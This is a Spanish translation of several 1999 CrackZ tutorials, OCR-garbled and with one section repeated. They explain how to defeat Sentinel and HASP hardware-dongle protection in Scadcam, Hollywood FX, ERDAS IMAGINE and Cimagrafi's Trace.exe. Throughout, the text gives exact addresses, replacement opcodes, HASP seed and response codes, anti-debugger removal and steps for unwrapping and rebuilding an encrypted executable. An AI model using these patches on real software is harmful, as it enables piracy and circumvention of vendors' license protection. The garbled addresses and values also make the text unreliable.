En 07D4, el código chequea flags en las localidades BP+06 y BP-14, pero nuestra ruta acá no está fijada por esas flags, esto 
resulta en el contar de loop [0084], siendo iniciado e incrementado 6 veces atras de donde comenzamos. Esto puede llevar solo 
a una conclusión, 1F1F es un truco. de hecho, no tener la DoNgLe una ventaja positiva para el chequeo 1F1F, porque lo 
burlaremos de todos modos. 


:0002.07A8 CMP DX,1010 <-- Otro código de retorno. 

:0002.07AC JNZ 07B0 <-- Salta aquí y cheque el código de retorno de nuevo. 
:0002.07AE JMP 07B6 <--— Salta a la misma localidad que el próximo chequeo. 
:0002.07B0 CMP DX,F010 <-- Otro código de retorno. 

:0002.07B4 JNZ 07C3 <-- Todavia saltar a otro chequeo. 


El código que sigue es también muy interesante, sin embargo, parece que si DX es 1010 o FO10, prescindiendo del código 
alcanza 07B6, y esto resulta en que algunas flags son fijadas. Si ni el código es correcto alcanzamos un chequeo final en 07C3. 


:0002.07B6 MOV WORD PTR [BP-14], 0001 <-- Flag. 

:0002.07BB MOV WORD PTR [9EFA], 0001 <--— Otra localidad. 

:0002.07C3 CMP DX,1210 <-- Ultimo código de chequeo de retorno. 

:0002.07C7 JNZ 07D4 <-- Jump (Salto) obviamente malo. 

:0002.07C9 MOV WORD PTR [BP-14], 0001 <-—- Alguna flag como las que encontramos 
tempranamente. 

:0002.07CE MOV WORD PTR [9EFA], 0002 <--— Localidad marcada como 2. 


El flag [BP-14] siempre está marcado con 1 y por lo tanto, no es importante, la pregunta es que calor de [YEFA] es bueno,(1 o 
2). Sin la DoNgLe difícil estar seguro, aunque revisando el listado muerto, ví que 1 era mas parecido a la flag correcta, ya que 
verdaderamente, este es el caso, el flag 2 trabaja como una función que deshabilita el switch para algunas operaciones, aunque 
solo sabrias esto con conocimiento previo. También parece ser 1 otra localidad donde la DoNgLe es llamada, facilmente 
puedes localizarla buscando el valor hex para la instrucción DoNgLe que lee CALL FAR. Hacer un parche para esto, es 
evidentemente facil. 


Considero esto como una protección DoNgLe del todo debil, pienso que mas chequeos podrian haber sido hechos y muchas 
mas trampas añadidas. Sin tener un tester (que pruebe), la flag [9EFA] es el único problema real, aunque evidentemente no es 
una molestia realmente grande para probar uno u otra. Parchear este codigo es, por supuesto, una tarea bastante rutinaria, 
aunque deberias aplicar la estetica usual. 


Adición Version 3.00.009 


Parecería que en esta ultima versión, por lo menos algún esfuerzo ha sido hecho para encubrir las funciones Sentinel cplus de 
la DoNgLe y mas chequeos son hechos en las words de retorno. Scadcam.exe ahora es un probrama de 32 bits y se llama en la 
DoNgLe via se32w.dll, las direcciones de la función RNBOcplus son recuperadas via LoadLibraryA en lugar de importarlas 
directamente. Sin embargo, los chequeos continuan siendo malos y algunas cosas son demasiado ridiculas :- 


:0045F 73D 
:0045F 742 
:0045F 743 
:0045F 747 
:0045F74A 
:0045F750 
:0045F756 
:0045F 75D 
:0045F75E 
:0045F75F 
:0045F763 
:0045F766 


PUSH 00000404 <-- 1028 bytes. 

PUSH EDX <-- Record de Paquetes CPlus. 

CALL [ESP+20] <-- RNBOcplusFormatPacket (). 

CMP AX,BX <-- Todos los Record de Paquetes estan bien. 
JNZ 0045F85C <-—- Mal Salto. 

MOV AX, [004ED4EC] <-- ID del desarrollador 
LEA ECX, [ESP+00000124] 


(AX=0). 
<-- Record de paquetes. 


PUSH EAX 

PUSH ECX <-- Empujar parámetros (por qué?). 
CALL [ESP+24] <-- RNBOcplusInitialize(). 
CMP AX, BX 


JNZ 0045F85C <-—- Mal Salto. 


Esto es posible y absolutamente una increible pieza de codigo, los desarrolladores de GeoPath me escuchan? 
RNBOcplusInitialize (si es algo como la API SuperPro) no debería tomar cualquier parametro, aún aca vemos un ID de 
Desarrollador de O y un puntero al Record de Paquetes dejados atras (no pude encontrar documentación en el website del 
Centinela sobre las API cplus, asi que es posible que este errado acá) :- 


:0045F778 PUSH 3F <-- Dirección a leer. 

:0045F77A PUSH EAX 

:0045F77B CALL ESI <-- RNBOcplusRead(). 

:0045F 77D CMP AX,BX <-- Chequear el estado. 

:0045F780 JNZ 0045F832 <-—- Mal salto. 

:0045F786 CMP WORD PTR [ESP+10],268F <-— Chequear la word (palabra) retornada. 
:0045F78D JNZ 0045F832 <-—- Mal salto. 


Mas lecturas son realizadas en las words 0,1,2 y 7 (0 es explicitamente chequeada para 0x1F1F), 1 8 2 son usadas para 
controlar el menu y las opciones en 3D (Un monton de chequeos en parte baja de la word 1), has una busqueda de las 
localidades en memoria donde estas words son almacenadas y no puedes perder el chequeo (Word 1 --> 004F7558, Word 2 --> 
004F735C), encontré que Word 1 = 0x45 y Word 2 = 0x7 parecen hacer el trabajo. 


Hollywood FX v3.08 - Tutorial 


http://www.hollywoodfx.com/ - Webpage. 


Traducción de “[G]oLe[E]* 


Durante los últimos meses he enfocado muchos de mis esfuerzos en el rango de DoNgLeS HASP, pero de nuevo regreso 
resaltando la debilidad fundamental de cualquier DoNgLe, su API. La mayoria de Centinelas que he visto no son tan fuertes 
como los equivalentes a las HASP, aunque la pregunta real es la implementación, los centinelas no parecen prestarse a 
esquemas fuertes, no hay, hasta donde sé, una facilidad para chequear algo mas que los códigos de retorno, un experto 
proteccionista HASP puede implementar algunos trucos furtivos. Para HFX (un buen programa que deberias comprarle a btw), 
gastaremos la mayor parte de nuestro tiempo en IDA/SoftICE. 


La protección principal que encontré (como no tengo PhotoShop/Premiere instalado en este momento) fue dentro de 
hollywoodfx30.dll, pero antes de que lo consigas, queda el pequeño problema del número de serie de la instalación, tristemente 
he perdido el mio y rastrear el instalador no seria muy divertido. En lugar de cocinar el Wisdec y decompilar el setup.ins, hay 
un par de parches que deberias hacer por ti mismo. 


Encontraremos la principal rutina de protección lo suficientemente facil con IDA y SoftICE, la dirección 1000932D es un 
realmente facil Entry Point (punto de entrada) (bpx InitCommonControls). Seguramente unas pocas lineas abajo estará nuestra 
protección. 


:10009364 PUSH off_100229F4 

:1000936A CALL sub_1000FA10 <-- Está conectada la DoNgLe?. 
:1000936F TEST AX,AX <-- AX tiene el código de Retorno. 
:10009372 JNZ short 100093A7 <-—- Mal Salto. 


Rastrea por 1000FA10 y nota el termino "Retraso del Centinela" ("Sentinel Lag" en inglés), el corto retrazo en SoftICE :). El 
retorno AX=3 es malo (chequea tus guias API, eso significa "Centinela no Conectado"), el resultado deseado es AX=0. 
Podemos rastrear esta función y facilmente identificar donde queremos parchear. 


:1000FA99 MOV AX,0003 <-- Mover_la_flag_incorrecta. 


Un monton de crackers podran criticar lo que voy a sugerir, ya que nunca tendremos conectada la DoNgLe, es perfectamente 
aceptable parchear este MOV a algo mas apropiado (digamos MOV AX,0000). Por supuesto podemos tambien ver, 
examinando el listado muerto, que forzando los 2 saltos condicionales a tomar el camino del código pensado, no nos dará 
ningun beneficio. Mas proteccionismo se aproxima. 


:1000938E CALL sub_100100E0 <-- Accesar la DoNgLe de nuevo. 

:10009393 TEST AX,AX <-- De nuevo AX almacena el código de retorno. 

:10009396 JNZ short 100093A7 <-—- Mal_salto. 

:10009398 MOV AL, BYTE PTR 10026A7C 

:1000939D CMP AL, BYTE PTR 100229F0 <--— No es necesario decir que estos bytes 
deberian ser iguales. 

:100093A3 JNZ short 100093A7 <-— Mal_Salto. 


:100101F9 AND AX, 00FF <-- Finalmente pulir AX. (Quiza cambiarlo a XOR AX,AX ). 


de nuevo puesdes rastrear este CALL e identificar donde parchear, aunque esto no es estrictamente necesario porque el CALL 


está referido solo en este código, también podemos cambiar el byte que es chequeado elegantemente si editamos el 
Mover_la_flag_incorrecta por MOV AL, BYTE PTR [100229F0]. El chequeo final se aproxima despues de algunos CALLs 
inocentes, diseñados para aburrir a los crackers, proporcionandote una vista a AX para un código de retorno de 3 o 9, es facil 
de localizar los chequeos de la DoNgLe. 


:10009420 CALL sub_1000FC30 <-- Chequear la DoNgLe (Todavía?) de Nuevo. 
:10009425 TEST AX,AX <-- Usar AX (Todavía) de nuevo. 

:10009428 JNZ short 10009434 <-—- Mal_salto. 

:1000942A CMP WORD PTR [EBP+0C], 5E6A <--— Código de retonro de la DoNgLe. 
:10009430 JNZ short 10009434 <-—- Mal_Salto. 

:10009432 XOR ESI,ESI <-- Un claro y excelente ESI del due no de la DoNglLe. 


No insultare tu inteligencia explicando esto. Rastrea 1000FC30 y has un parche en la dirección 1000FCF3 con XOR AX,AX. 
También tienes el espacio de la dirección para cambiar el CMP a MOV (66 C7 45 0C 6A 5B). Ahora parece como si tenemos 
un Hollywood FX trabajando. Obviamente ahora que has visto como está estructurada la API en el programa principal, 
cualquier protección dentro de los plug-ins seran eminentemente similares (incidentalmente he visto los plug-ins Premiere y 
parecen estar libres de protección). Ahora puedes borrar el directorio /Sentinel. 


Notas Adicionales 


Un pequeño añadido a este tutorial y un agradecimiento a fuhrely por pasar esta información. Si piensas actualmente crackear 
completamente la protección, hay varios dlls adicionales, los cuales necesitaras tomar en consideración - aparentemente 
también hacen chequeos de DoNgLe, lo cual contradice mi implicación de que hollywoodfx30.dll era el unico culpable. Estoy 
totalmente seguro que estos chequeos son muy similares a los descritos en este TuToRIAl. 


Obviamente es importante tener a alguien que use un programa para chequear tu trabajo :-), en estas instancias, tienen mis 
disculpas. 


O Dongles QU Return to Main Index 


O 1999 CrackZ. 11th March 1999. 


ERDAS IMAGINE v8.2 - Tutorial 


<http://www.erdas.com> - Pagina web 


Me parece que ahora mas programadores alguna vez usan protecciones de hardware para proteger sus aplicaciones (cuando en 
realidad unas rutinas de ASM bien formadas causarian mucha mas molestia a la mayoria de crackers). De hecho si tuviese el 
dongle para todos los programas de mi ordenador la parte trasera de este tendria una extension de 3ft. Si Ud va a usar un 
dongle entonces recuerde que la utilizacion de ellos no es bastante note tambien que en mi opinion una proteccion de 
CERROJO basica es probablemente mejor que un Centinela. 


ERDAS IMAGINE es un software bastante complejo, lanzando el prorama nos da un error messagebeep (ponemos un bpx para 
que saltemos al interior de una dll (elib.dll), F12 nos lleva dentro de eml.exe (debajo de la llamada que nos dio este error un 
scroll con Ctrl + Up nos mostrara algun codigo interesante. 

Desensamblamos eml.exe (12,5K), el programador estaba obviamente versado en una dll que escribe porque el programa 
principal realmente carga el codigo para todas las importaciones de dll. Aunque el desarrollo sabio recomienda su utilizacion 
un cracker experto no tendra ningun problema para encontrar su proteccion den un 12 k.exe 


este es el codigo devuelto por el messagebeep: 


:004013BB CALL EMLLIB.eeml_Init <-- Aqui el dongle esta conectado. 
:004013C0 ADD ESP,14 <-- Stack correcto. 

:004013C3 MOV EBX,EAX <-—- Almacena la funccion y devuelve el valor. 
:004013C5 CMP DWORD PTR [ESP+10], 00000000 <--— Compara. 

:004013CA JZ 004013F3 <-- Salto Correcto. 


Entonces tenemos el nombre de la proteccion dll (el que ahora vamos a parchear), un valor de DWORD que sabemos que 
vinieron del dongle y un punto de entrada conveniente para seguir nuestro sondeo. Volveremos a la utilizacion de nuestras 
teorias que usan un deadlisting. El codigo continua aqui. 


:004013F8 PUSH 004051BC <-- "Chequea las Licencias..." 
:00401410 CALL Elib.esec_CheckSecurity <-- Otra dll usada. 
:00401415 ADD ESP,10 <-- Stack. 

:00401418 TEST EAX,EAX <-- EAX>= cero por favor. 

:0040141A JGE 00401455 <-- Obviamente correcto. 


Puedo recordar la lectura en una guía de puesta en practica de Centinela en la que decia que nunca debe decir a un cracker lo 
que hace..., aunque el programador parezca usar otro dll para realizar esta comprobacion. Ahora que tenemos nuestras teorias 
dejan el Cargador y un bpx para 004013BA, entonces traceatemos la 2* proteccion de dlls exportadas para ver donde estan las 
instrucciones de ofensa, obviamente el resultado ideal es tambien el prche de este dll por si acaso las llamadas son 
exportadas en otra parte (aunque yo dude de ello). 


Esta es la primera posicion que examinaremos (el desensamblaje de emllib.dl!l). 


:6202A3CC CALL Elib.esec_CheckSecurity <-- Despues de todo esta es la dll. 
:6202A3D4 MOV DWORD PTR [EBP-18],EAX <-— Usa el valor de EAX. 

:6202A3D7 CMP DWORD PTR [EBP-18],00000000 <-->= O. 

:6202A3DB JNL/JGE 6202A408 <-- Salto correcto. 


El CheckSecurity tambien es llamado dentro de elib.dll y debe devolver EAX <= 0 para que una licencia deba existir, 
tristemente elib.dll mide 5,69 Mb's para desensamblar y a los que pueden ver que el metodo de desensamblaje es por Softlce. 
El archivo de tronco del codigo lo arrebate mediante la utilizacion del Symbol Loader. 


0137:61499C45 
0137:61499C4A 
:61499C4D MOV 
0137:61499C50 
0137:61499C53 
0137:61499C57 
0137:61499C99 
0137:61499C9E 


El JZ 61499CA3 es evidentemente un salto bueno, los datos DWORD del dongle[EBP - 20] necesita ser O, sinembargo 
instucciones subsecuentes afectan el valor de EAX que entonces devolvera FEFFFFFF (-1) por equivocacion. Claramente una 
opcion sensible es parchear el mal MOV EAX,FFFFFFFF para que resulte MOV EAX,00000000 (B8 00 00 00 00), esto 
asegura que EAX es devuelto como valor 0 (el correcto), la unica cuestion potencial es en cuanto 61499CDE es llamado, 


CALL 61499CDE <-- Llama a la maravillosa proteccion. 
ADD ESP,04 0137 

EAX, [EBP-20] <-- Mueve el dato del dongle a EAX. 
MOV [EBP-24],EAX <-—- Almacena Q [EBP-24]. 

CMP DWORD PTR [EBP-24],00 <-— Esto es 0. 

JZ 61499CA3 <-- Este es un buen salto. 


MOV EAX,FEFFFEFFFF <-- Devuelve un mal EAX. 
JMP 61499CD9 <-— Devuelve la funccion. 


muchos acontecimientos necesitaran la investigacion. 


Como esto resulta que 61499CDE es llamdo desde 2 sitios. El que esta encima y que conocemos 6149C2DD. Si chequeamos la 
2* referencia veremos que usa el valor de EAX (almacenando esto en [EBP-14]),0 es el resultado deseado. 
Esto significa que al menos para el empleo de un solo usuario devolviendo el MOV EAX, incorrecto que describi antes es 


bastante. Cmo la opcion de red tambien llama al ChecSecurity el patch resulta efectivo. 


O 1999 CrackZ. 7th February 1999 
Traduccion: $ Deejay Mihai 8 


La envoltura HASP y Técnicas para desproteger la mochila 
HASP 


Objetivo :- Trace.exe (incluído en Cimagrafi v5.07+). 
La técnica DLL. 


Si ya conoces las protecciones HASP sabrás que esta protección se presenta de dos formas, la API a través de la cual los 
servicios hasp() son activados y el encriptador de ejecutables PE conocido como la envoltura (envelope) el cual depende de las 
respuestas que le envía la mochila para realizar la descriptación. He elegido Trace.exe por dos razones, primero, es un objetivo 
'envuelto' tan bueno como cualquier otro, y en segundo lugar estamos aquí para aprender sobre ingeniería inversa, al contrario 
que a robar Cimagrafi (un program de diseño bastante bueno según mi humilde opinión, protegido tristemente por una HASP). 
El envoltorio de la HASP comprueba la prensecia de SoftICE utilizando un truco muy común, CreateFileA buscando el 
controlador de video //./SIWVID, sin embargo, antes de empezar a explorar en inmensas cantidades de codigo recomiendo que 
utilices PEDump sobre el objetivo simplemente para hacerte una idea sobre a que te enfrentas. 


Fíjate en _TEXT_HA que es la sección de la API HASP, que veremos más adelante, y .protect, la envoltura, en algunas 
ocasiones estas secciones tienen otros nombres (p.e. .protectzz) no obstante la envoltura Win32 siempre tiene un tamaño 
aproximado de de 160k. Como puedes prever la envoltura está fuertemente encriptada (desensamblarla te da 300h de la ronda 
inicial de descriptación que funciona con el método de deslizar una llave XOR sobre muchos pequeños trozos de código y 
luego llamando a las nuevas rutinas descriptadas, como puedes imaginar, estudiar esto no es para personas con problemas de 
corazón. 


La descriptación es bastante complicada y no hay nada realmente interesante en su estudio, de hecho, al trazarlo a demasiado 
bajo nivel con SoftICE provoca un horrible cuelge (creo que esto está relacionado con SEH). Lo que la envoltura hace 
posteriormente es llamar su propia rutina hasp() descriptada para comprobar la existencia de una determinada mochila antes de 
usar los códigos de respuesta para descriptar y devolver el control al programa original. El primer paso es eliminar la rutina 
anti-SoftICE descrita arriba, después de lo cual deberíamos hacer un bpx a FreeEnvironmentStringsA que es llamdo en la 
mayoría de las protecciónes HASP de 32 bits inmediatamente después de la llamada a la rutina principal hasp(). Así aparece :- 


:00546AC5 
:00546AC8 
:00546AC9 
:00546ACF 
:00546AD1 
:00546AD”7 
:00546AD9 
:00546AD”7 
:00546AD9 


CALL [EBP+00] <-- Esto es hasp(). 

PUSHAD <-—- Salva todos los registros. 

LEA ESI, [0054A395] 

PUSH DWORD PTR [ESI] 

LEA ESI, [KERNEL32!FreeEnvironmentStringsA] 
CALL [ESI] 

ESI, [KERNEL32!FreeEnvironmentStringsA] 
CALL [ESI] 


POPAD <-- Restablece los registros (aquí paras tú). 


:00546ADA 


:005449C4 
:005449C5 
:005449CA 


RET 


PUSH EBP <-- Coloca un bpx aquí. 
CALL 0054691F <-- hasp() de alto nivel. 
POP EBP 


Cuando vuelves de la rutina, la rutina de la cobertura hasp() acaba de ser ejecutada por primera vez, la cual es siempre 
IsHaspO, así que pon EAX=1 y un bpx para el siguiente servicio. Con seguridad el siguiente servicio es 2 (en BH), ECX 
contiene el valor de la contraseña 1 del fabricante, EDX la contraseña 2 del fabricante y EAX el código de la semilla. En este 
caso tenemos EAX=512, ECX=2459 € EDX=2CFX, después de la llamada a hasp() de nuevo de EAX a EDX = 0, deberían 
contener los codigos de respuesta requeridos para la semilla dada. En todos las coberturas Win32 que he visto, ha sido posible 
recuperar estas respuestas siguiendo la ejecución del código (no es que realmente lo necesitemos). 


Utilizando el algoritmo HaspCode podemos encontrar las respuestas deseadas, así que parchea en EBOE, 6D3B, 19FA « BF33, 
ahora FS y encontrarás la comprobación repetida, parchea en las respuestas de nuevo. La tercera comprobación disminuye el 
valor de la semilla en 1 así que necesitarás parchear en 904C, 5CD5, DAFE € 30BE (devuelve como semilla 512C, estas 
respuestas no pueden recuperarse sin conocer el algoritmo HaspCode(). Son estos valores los que usaremos para la 
descriptación después de la función hash, claro :-). Recomiendo que deshabilites todos los breakpoints y bpx en VirtualAlloc, 
en otras versiones de la cobertura WriteProcess Memory también se usa extensamente. Después de estos breakpoints, coloca la 
ventana de datos en la RVA de la primera sección (normalmente en 401000) y mira con atención, hay probablemente dos 
técnicas rápidas para encontrar el punto de entrada original. 


Una de las mejoras formas es usar combinaciones de bpx's en VirtualAlloc/WriteProcessMemory y GetProcAddress, y luego 
probar y seguir el código intuitivamente, otra forma (quizás más sencilla), sea hacer un map32 y obtener el rango de 
direcciones de la primera sección, luego poner un bpr para toda el rango de la sección, con lo cual acabarás aquí en el trascurso 
de algunos 'fixups' o en OEP :-). En el caso de Trace.exe, dos breakpoints en VirtualAlloc y el bpr que he descrito arriba te 
permitirán encontrar el O.E.P (RVA OxAF790), tan pronto en cuanto llegues aquí, copia el contenido de todas las secciones, 
puede que incluso tu puedas usar ProcDump Bhrama, IceDump o TRW para obtener un PE válido :-). 


Aquí tienes los detalles si eliges hacer esto a mano :-< 


Sección RVA Tamaño Localización Tamaño en bytes 
«text x401000 xAE 9E4 x1000 715,236 
.data x4B0000 x112AC xAEE00O 70,316 
.reloc x4CA000 xB6FC xC2A00 46,844 


Ahora puedes pegar estas secciones de código sobre los bytes originales, pero se muy muy cuidadoso a la hora de convertir la 
RVA en la dirección correspondiente en el fichero (esta parte la he hecho yo por tí), fíjate también en que .rsrc no está 
encriptada en este ejemplo por la cobertura HASP. Si estás realizando esta parte con UltraEdit, te recomiendo que lo hagas sin 
prisas para evitar errores, también date cuenta de que puedes destruir la sección .protect puesto que ya no la vamos a necesitar 
más. 


Corrección el PE 


Esta será la etapa más importante antes de que podamos ejecutar el fichero reconstruido. En el desplazamiento 0x128 
necesitamos actualizar nuestro punto de entrada (0xAF790 como identificamos antes) Después necesitamos corregir la RVA de 
importación y su tamaño (redondea el tamaño con el alineamiento del fichero), ésto, de nuevo, es fácil de encontrar (coloca un 
breakpoint a GetProcAddress y un bpr a cualquier lugar de la sección de .idata) aquí está el código :- 


:bpr 004c5000 004c5000+250c rw 
Break debido a BPR +0167:004C5000 +0167:004C750C RW 


:0053C800 MOV EAX, [EBP-0C] <-- VA de la tabla de importaciones (4C5000). 
:0053C803 CMP DWORD PTR [EAX+0C],00 
:0053C807 JZ 0053C860 


Finalmente corrige las entradas del tamaño de la BASELOC y en el directorio de datos, OXCA000 (RVD de .reloc) y B800 
(tamaño) en este caso. ¿He mencionado que puedes borrar la sección .protect de la cabecera PE y actualizar el número de 
secciones?. Ahora, por supuesto, puedes desproteger la mochila HASP de Cimagrafi en la forma usual :-). 


Técnica DLL de desprotección de la mochila HASP 


¿Debería señalar que yo no soy el pionero en el uso de esta técnica y que sólo mejor en el caso que haya muchos ficheros 
protegidos con HASP y quieres bpx sólo un lugar para examinar todos las comprobaciones, también es una técnica que puede 


llevarse a cabo con movimientos de dedo en tu editor hexadecimal. Se incluye ahora en el archivo HASP (prueba en la página 
herramientas) Te he dejado un hasp.dll (esta es en realidad una dll HASP para desarrolladores que ha sido editada un tanto para 
nuestros propósitos). Por favor, ten cuidado ya que esta dll no funciona siempre y cuando no lo hace tu sistema será 
probablemente destruido .... ciertamente no funciona tal cual con Cimagrafi, la pila necesita ser corregida). No voy a 
extenderme más en como ésta funciona (la he probado sólo con MAYA Fusion v2.51b), los seguidores de la HASP se 
figurarán el resto por sí solos :- 


1. Localiza la marca HASP 'cmp bh, 32' en tu objetivo. 


2. Sigue el código por debajo de la siguiente CALL. Cambia las cuatro lineas PUSHAD en la llamada (p.e. la segunda 
instancia) en un NOP y anota la dirección a la que apunta ESI también (dos líneas por encima). 


3. Cambia el CALL GetModuleHandleA (alrededor de diez líneas más abajo) a CALL LoadLlbraryA. 


4. Localiza el siguiente CALL que llame a GetModuleHandleA y sigue el código que hay por debajo. El primer CALL 
GetProcAddress debería salvar EAX a la ubicación de ESI que anotaste en el punto 2. Cambia la línea inmediatamente después 
para que apunte a ESI en esta dirección. 


5. Localiza la cadena 'KERNEL32.DLL'' y sustitúyela con el nombre de tu nueva dll, Asegúrate de cambiar sólo la refencia 
HASP (busca nombres HASP próximos como HASPUT16.DLL). 


6. Carga tu programa, bpx la referencia 'cmp bh, 32", ejecuta paso a paso el programa y haz tus propias averiguaciones, edita la 
dll según lo que necesites. 


O Mochilas l Menú principal 
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La Envoltura HASP €: Técnicas para Crackear HASP 


(Nota del Traductor) 


Okas, debido a que existe la necesidad de profundizar en el crackeo de DoNgLeS o Mochilas, he traducido este pekeño tut, 
espero sirva de algo y ya podamos vencer al ..che Carto.(/Nota del Traductor) 


Objetivo :- Trace.exe (incluido con Cimagrafi v5.07+). 
La Técnica de Crackeo de la DLL HASP 


Si le tienes mucha fe a HASP sabrás que la protección toma 2 formas, la API por la cual los servicios hasp() son accionados y 
el encriptador PE totalmente inflado (Traductor: supongo que quiere decir inutil) de Aladdin, conocido como envoltura, que 
cuenta con códigos de respuesta de la Dongle para hacer la desencripción. Escogí Trace.exe por 2 razones, primero es un 
objetivo envuelto tan bueno como cualquiera, y segundo estamos aquí para aprender acerca de Ingenieria Inversa en lugar de 
robar Cimagrafi (un programa con un buen diseño imho que está penosamente protegido con una HASP). La envoltura HASP 
revisa la presencia de SoftICE usando un truco muy familiar, CreateFileA para el driver de video //./SIWVID, sin embargo, 
antes de empezar a cavar en una vasta cantidad de código, te recomiendo volcar el PE del objetivo para mirar contra que estás. 


Nota el _TEXT_HA que es la sección API de HASP, la veremos despues, y .protect la envoltura actual, algunas veces, estas 
secciones tienen cambiados los nombres (ej. .protectzz) y la envoltura Win32 siempre la iguala a algo alrededor de 160k. 
Como podrías esperar, la envoltura está fuertemente encriptada (desensamblar te dará cerca de 300h de la ronda inicial de 
desencripción que trabaja en el principio de deslizar un XOR a traves de muchas rondas pequeñas de código y entonces 
llamando las nuevas rutinas de desencripción, como podrás imaginar, estudiar esto no es para los de corazón débil. 


La desencripción es bastante enredada y no hay nada que realmente pueda ser ganada con estudiarla, de hecho rastrearla en 
SoftICE resultará en un cuelgue muy desagradable (Pienso que esto está relacionado con el SEH). Lo que la envoltura hace 
subsecuentemente es llamar su propio hasp() desencriptado para revisar una dongle especifica antes de usar los códigos de 
respuesta para desencriptar y tomar control del programa original. El primer paso es matar el truco anti-SoftICE que describí 
arriba, despues deberás poner un bpx para FreeEnvironmentStringsA que es llamada en la mayoria de protecciones HASP 32- 
bit inmediatamente despues del CALL a la rutina hasp() principal. Aquí está como se mira :- 


:00546AC5 
:00546AC8 


CALL [EBP+00] <-- Este es hasp() real. 
PUSHAD <-— Grabar todos los registros. 


:00546AC9 
:00546ACF 
:00546AD1 
:00546AD”7 
:00546AD9 
:00546ADA 


:005449C4 
:005449C5 
:005449CA 


LEA ESI,[0054A395] 

PUSH DWORD PTR [ESTI] 

LEA ESI, [KERNEL32!FreeEnvironmentStringsA] 
CALL [ESI] 

POPAD <-—- Restaurar los registros 
RET 


(irrumpes aquí). 


PUSH EBP <-- Ahora fija un bpx aquí. 
CALL 0054691F <-- hasp() en el nivel mas Alto. 
POP EBP 


Cuando retornas la rutina de la envoltura hasp() justo ha sido ejecutada por primera vez, siempre su IsHasp(), así fija EAX=1 y 
un bpx para el siguiente servicio. Es muy seguro que el siguiente servicia es 2 (en BH), ECX mantiene el password 1 del 
vendedor, EDX el password 2 del vendedor $ EAX el código semilla. En este caso tenemos EAX=512D, ECX=2459 é 
EDX=2CP3, despues de la llamada a hasp() de nuevo EAX a través de EDX = 0, deberían ser llenados con los códigos de 
respuesta requeridos para la semilla dada. En todas las envolturas Win32 he visto que ha sido posible recuperar estas respuestas 
con un simple rastreo (no que lo necesitemos actualmente). 


Usando el algoritmo HaspCode encontramos la respuesta deseada, así que parchamos EBOE, 6D3B, 19FA ¿ BF33, ahora FS y 
obtendrás el chequeo repetido, parcheamos de nuev la respuesta. El tercer chequeo decrementa el código semilla 1 así que 
necesitas parchear 904C, 5CD3, DAEE dz 30BE (retorna para la semilla 512C, estas respuestas no pueden ser recuperadas sin 
saber el algoritmo HaspCode()). Estos valores serán usados para la desencripción despues que la función picadillo por supuesto 
:-). Recomiendo que desactives ahora todos los breakpoints y fijes un bpx para VirtualAlloc, en diferentes versiones de la 
envoltura, WriteProcess Memory también es extensamente usadas. Despues de estas interrupciones, coloca la data window en 
el RVA de la primer sección (usualmente es 401000) y mira lentamente, probablemente hay 2 técnicas rápidas para encontrar 
el OEP (punto de entrada original). 


Una de las mejores formas es usar combinaciones de bpx's en VirtualAlloc/WriteProcessMemory 4 GetProcAddress, entonces 
tratar intuitivamente, otra forma (quiza más fácil), hacer map32 y obtener el rango de dirección de la primera sección, entonces 
fijar un bpr para el rango entero de la sección, caerás aquí o durante algunos arreglos o en el OEP :-). En el caso de Trace.exe 2 
breaks en VirtualAlloc y el bpr que describí arriba te encontrarán el O.E.P (RVA OxAF790), tan pronto como lo alcances, 
vuelca todas las secciones, quiza puedas usar ProcDump Bhrama o IceDump o TRW para hacer un PE válido :-). 


Aquí están los detalles si has escogido hacerlo manualmente :- 


Sección RVA Tamaño Raw Localidad Tamaño en bytes 
«text x401000 xAE9E4 x1000 715,236 
.data x4B0000 x112AC xAEE0OO 70,316 
.reloc x4CA000 xB6FC xC2A00 46,844 


Ahora puedes pegar estos datos volcados y desencriptados sobre los bytes originales, pero se muy cuidadoso cuando conviertas 
el RVA en un Offset Raw en el archivo actual (He hecho esta parte por ti), también nota que .rsre no está encriptado en este 
ejemplo con la envoltura HASP. Si estás haciendo esta parte con UltraEdit, te aconsejo tomarlo muy despacio para evitar 
errores, también nota que puedes eliminar completamente la sección .protect ya que no la necesitamos más. 


Arreglando el PE 


Esto será el paso importante antes de que podamos correr nuestro archivo reconstruido. En offset 0x128 necesitamos actualizar 
nuestro punto de entrada (0xAF790 como lo identificamos antes). Después necesitamos arreglar nuestro RVA de importación y 
el tamaño (redondea el tamaño a la alineación del archivo), esto también es fácil de encontrar (fija un breakpoint para 
GetProcAddress y luego un bpr para cualquier parte en la sección .idata), aquí está el código :- 


:bpr 004c5000 004c5000+250c rw 
Interrumpe debido a BPR +0167:004C5000 +0167:004C750C RW 


:0053C800 MOV EAX, [EBP-0C] <-- VA de la tabla de importación (4C5000). 
:0053C803 CMP DWORD PTR [EAX+0C],00 
:0053C807 JZ 00530860 


Finalmente arregla el BASRELOC 42 y el tamaño de las entradas en el directorio de datos, OXCA000 (RVA de .reloc) $2 B800 
(tamaño) en este caso. Mencioné también que deberías borrar la sección .protect del encabezado PE y actualizar el número de 
secciones. Ahora por supuesto deberás crackear la protección HASP de Cimagrafí de la manera usual :-). 


La Técnica de Crackeo de la DLL HASP 


Debería apuntar que no soy el pionero de esta técnica y que realmente tiene ventajas si tienes varios archivos protegidos por 
HASP y quieres bpx una simple localidad para examinar todos los chequeos, también hay una técnica que puede ser usada 
usando los movimientos de los dedos dentro de tu HEX editor. Te hé dado un hasp.dll (actualmente es una dll que HASP 


provee a los desarrolladores que ha sido editada un poco para nuestros propositos). Por favor, ten cuidado ya que esta dll no 
siempre trabajará y cuando no lo hace, tu sistema probablemente será destruido ..... ciertamente no trabaja 'como es' con 
Cimagrafi, la pila necesita ser corregida). No explicaré más como es que trabaja esto (Solo probé con MAYA Fusion v2.51b), 
los vigilantes de HASP se figurarán el resto por sí mismos :- 


1. Localizar la marca de fabrica HASP 'cmp bh, 32' dentro de tu objetivo. 


2. Rastrear en el siguiente CALL. Cambiar el PUSHAD 4 lineas en el CALL (p.e. la 2a instancia) a un NOP y nota la dirección 
ESTI que está apuntando tambien (2 lineas arriba). 


3. Cambia la llamada a GetModuleHandleA (acerca de 10 líneas arriba) a LoadLibraryA. 


4. Localiza la siguiente llamada que sigue a lo que fue GetModuleHandleA y rastrea abajo. La primer llamada a 
GetProcAddress debería granar EAX a la localidad ESI que notaste en la segunda parte. La línea intermedia después debería 
ser cargada para apuntar a ESTI en está dirección. 


5. Localiza la cadena 'KERNEL32.DLL' y cambiala al nombre de nuestra nueva dll, asegurate de cambiar unicamente la 
referencia a HASP (busca nombres HASP como HASPUT16.DLL). 


